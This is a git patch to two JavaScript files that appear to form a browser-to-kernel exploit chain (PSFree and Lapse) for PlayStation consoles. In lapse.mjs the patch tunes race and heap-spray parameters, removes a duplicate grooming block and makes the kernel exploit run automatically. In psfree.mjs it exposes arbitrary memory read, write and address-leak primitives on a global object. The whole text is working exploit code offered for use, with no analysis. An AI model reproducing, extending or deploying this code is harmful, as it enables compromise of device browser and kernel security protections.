From 869e4ab9f08e206342d0961b83c70cf19d3f8f48 Mon Sep 17 00:00:00 2001 From: Kameleon <77245601+kmeps4@users.noreply.github.com> Date: Sat, 17 May 2025 13:22:55 -0600 Subject: [PATCH] Set num_alias = 100 / Advise fom ABC --- lapse.mjs | 23 +++++++++----------- psfree.mjs | 63 ++++++++++++++++++++++++++++++++++++++++++++++++++++-- 2 files changed, 71 insertions(+), 15 deletions(-) diff --git a/lapse.mjs b/lapse.mjs index ff92a0c..ddd568f 100644 --- a/lapse.mjs +++ b/lapse.mjs @@ -133,7 +133,7 @@ const main_core = 7; const num_grooms = 0x200; const num_handles = 0x100; const num_sds = 0x100; // max is 0x100 due to max IPV6_TCLASS -const num_alias = 10; +const num_alias = 100; const num_races = 100; const leak_len = 16; const num_leaks = 5; @@ -1640,18 +1640,7 @@ function setup(block_fd) { const greqs = make_reqs1(num_reqs); // allocate enough so that we start allocating from a newly created slab spray_aio(num_grooms, greqs.addr, num_reqs, groom_ids_p, false); - cancel_aios(groom_ids_p, num_grooms); - { - // chosen to maximize the number of 0x100 malloc allocs per submission - const num_reqs = 4; - const groom_ids = new View4(num_grooms); - const groom_ids_p = groom_ids.addr; - const greqs = make_reqs1(num_reqs); - // allocate enough so that we start allocating from a newly created slab - spray_aio(num_grooms, greqs.addr, num_reqs, groom_ids_p, false); - cancel_aios(groom_ids_p, num_grooms); - } - + cancel_aios(groom_ids_p, num_grooms); return [block_id, groom_ids]; } @@ -1667,6 +1656,7 @@ function setup(block_fd) { // // the exploit implementation also assumes that we are pinned to one core export async function kexploit() { + const _init_t1 = performance.now(); await init(); const _init_t2 = performance.now(); @@ -1743,5 +1733,12 @@ export async function kexploit() { for (const sd of sds) { close(sd); } + } + kexploit(); + + + + + diff --git a/psfree.mjs b/psfree.mjs index 2c5d03a..48d8aa4 100644 --- a/psfree.mjs +++ b/psfree.mjs @@ -829,6 +829,64 @@ async function make_arw(reader, view2, pop) { ); log('achieved arbitrary r/w'); + window.p = { + read1(addr) { + addr = new Int(addr.low, addr.hi); + const res = mem.read8(addr); + return res; + }, + + read2(addr) { + addr = new Int(addr.low, addr.hi); + const res = mem.read16(addr); + return res; + }, + + read4(addr) { + addr = new Int(addr.low, addr.hi); + const res = mem.read32(addr); + return res; + }, + + read8(addr) { + addr = new Int(addr.low, addr.hi); + const res = mem.read64(addr); + return new int64(res.low, res.high); + }, + + write1(addr, value) { + addr = new Int(addr.low, addr.hi); + mem.write8(addr, value); + }, + + write2(addr, value) { + addr = new Int(addr.low, addr.hi); + mem.write16(addr, value); + }, + + write4(addr, value) { + addr = new Int(addr.low, addr.hi); + mem.write32(addr, value); + }, + + write8(addr, value) { + addr = new Int(addr.low, addr.hi); + if (value instanceof int64) { + value = new Int(value.low, value.hi); + mem.write64(addr, value); + } else { + mem.write64(addr, new Int(value)); + } + + }, + + leakval(obj) { + const res = mem.addrof(obj); + return new int64(res.low, res.high); + } + }; + + rdr.restore(); // set the refcount to a high value so we don't free the memory, view's // death will already free it (a StringImpl is currently using the memory) @@ -856,7 +914,8 @@ async function main() { await make_arw(rdr, view2, pop); clear_log(); - // path to your script that will use the exploit - import('./lapse.mjs'); + + import('./lapse.mjs'); + } main();